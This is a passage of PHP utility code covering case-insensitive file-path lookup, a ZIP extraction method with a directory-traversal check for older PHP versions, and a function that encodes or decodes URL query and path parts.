if (count($path) === 1) {
$absDir = convertAbsoluteDir($path[0]);
if ($absDir !== false) {
// in this case, we have an absolute path of a root directory
if ($findDir === 0) {
return false;
} else {
// this will give them the actual root directory for this OS
return $absDir;
}
} else {
// in this case, just try to find a relative target
return find_in_dir('.', $path[0], $findAltExt, $findDir);
}
}
// we are going to search for the final component a bit differently,
// since it can be either a directory or a file, so lets pull that off
$finalComponent = array_pop($path);
// now we need to find the directory portion of the path
// if is_dir() cannot find it, then we will start pulling off
// components from the end of the path until we get a directory
// we can locate
$dirsNotFound = array();
while (!is_dir(implode('/', $path))) {
// for the first dir, check if its an absolute or relative dir
if (count($path) === 1) {
$absDir = convertAbsoluteDir($path[0]);
if ($absDir !== false) {
// if absolute, set the starting path to the actual root
$path = array($absDir);
} else {
$dirsNotFound[] = array_pop($path);
}
break;
// checking first dir, can't go back any more
} else {
// move last dir in $path to start of $dirsNotFound
$dirsNotFound[] = array_pop($path);
}
}
$dirsNotFound = array_reverse($dirsNotFound);
// correct order of dirs
// if $path is empty, not even the first dir could be identified
// so, we will assume its a relative path
// otherwise, we are going to use what we could
if ($path === array()) {
$baseDir = '.';
} else {
$baseDir = implode('/', $path);
}
// now lets do a case-insensitive search for the rest of the dirs
foreach ($dirsNotFound as $targetDir) {
// use find_in_dir, but only search for dirs
$search = find_in_dir($baseDir, $targetDir, false, 2);
if ($search === false) {
return false;
}
$baseDir .= '/' . $search;
}
// Huzzah! At this point, we should have found our directory,
// and we just need to search for the final component
$finalSearch = find_in_dir($baseDir, $finalComponent, $findAltExt, $findDir);
if ($finalSearch === false) {
return false;
} else {
$existingPath = $baseDir . '/' . $finalSearch;
if (substr($existingPath, 0, 2) === './') {
$existingPath = substr($existingPath, 2);
}
return $existingPath;
}
}
/**
* Decompresses the given content
*
* @param string $content
* @return string
*/
public function decompress($content)
{
$archive = $this->getArchive();
if (file_exists($content)) {
$archive = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, cleanPath($content));
} elseif (empty($archive) || !file_exists($archive)) {
require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
throw new Zend_Filter_Exception('ZIP Archive not found');
}
$zip = new ZipArchive();
$res = $zip->open($archive);
$target = $this->getTarget();
if (!empty($target) && !is_dir($target)) {
$target = dirname($target);
}
if (!empty($target)) {
$target = rtrim($target, '/\\') . DIRECTORY_SEPARATOR;
}
if (empty($target) || !is_dir($target)) {
require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
throw new Zend_Filter_Exception('No target for ZIP decompression set');
}
if ($res !== true) {
require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
throw new Zend_Filter_Exception($this->_errorString($res));
}
if (version_compare(PHP_VERSION, '5.2.8', '<')) {
for ($i = 0; $i < $zip->numFiles; $i++) {
$statIndex = $zip->statIndex($i);
$currName = $statIndex['name'];
if ($currName[0] == '/' || substr($currName, 0, 2) == '..' || substr($currName, 0, 4) == './..') {
require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
throw new Zend_Filter_Exception('Upward directory traversal was detected inside ' . $archive . ' please use PHP 5.2.8 or greater to take advantage of path resolution features of ' . 'the zip extension in this decompress() method.');
}
}
}
$res = @$zip->extractTo($target);
if ($res !== true) {
require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
throw new Zend_Filter_Exception($this->_errorString($res));
}
$zip->close();
return $target;
}
function myUrlcode($url, $encode = 1)
{
// Make sure we have a string to work with
//testurl http://www.playpo.co.il/??????/
if (!empty($url)) {
// Explode into URL keys
$urllist = parse_url($url);
// Make sure we have a valid result set and a query field
if (is_array($urllist) && isset($urllist["query"])) {
// Explode into key/value array
$keyvalue_list = explode("&", $urllist["query"]);
// Store resulting key/value pairs
$keyvalue_result = array();
foreach ($keyvalue_list as $value) {
// Explode each individual key/value into an array
$keyvalue = explode("=", $value);
// Make sure we have a "key=value" array
if (count($keyvalue) == 2) {
// Encode the value portion
$encode == 1 ? $keyvalue[1] = rawurlencode($keyvalue[1]) : ($keyvalue[1] = rawurldecode($keyvalue[1]));
// Add our key and encoded value into the result
$keyvalue_result[] = implode("=", $keyvalue);
}
}
// Repopulate our query key with encoded results
$urllist["query"] = implode("&", $keyvalue_result);
// Build the the final output URL
}
//end if isset query
if (is_array($urllist) && isset($urllist["path"])) {
// Explode into key/value array
$keyvalue_list2 = explode("/", $urllist["path"]);
// Store resulting key/value pairs
$keyvalue_result2 = array();
foreach ($keyvalue_list2 as $value2) {
// Encode the value portion
$encode == 1 ? $val2 = rawurlencode($value2) : ($val2 = rawurldecode($value2));
// Add our key and encoded value into the result
$keyvalue_result2[] = $val2;
}
// Repopulate our query key with encoded results
$urllist["path"] = implode("/", $keyvalue_result2);
unset($keyvalue_list2, $keyvalue_result2, $keyvalue_list, $keyvalue_result);
// Build the the final output URL
}
//end if isset query
$url = (isset($urllist["scheme"]) ? $urllist["scheme"] . "://" : "") . (isset($urllist["user"]) ? $urllist["user"] . ":" : "") . (isset($urllist["pass"]) ? $urllist["pass"] . "@" : "") . (isset($urllist["host"]) ? $urllist["host"] : "") . (isset($urllist["port"]) ? ":" . $urllist["port"] : "") . (isset($urllist["path"]) ? cleanPath($urllist["path"]) : "") . (isset($urllist["query"]) ? "?" . $urllist["query"] : "") . (isset($urllist["fragment"]) ? "#" . $urllist["fragment"] : "");
unset($urllist);
}
return $url;
}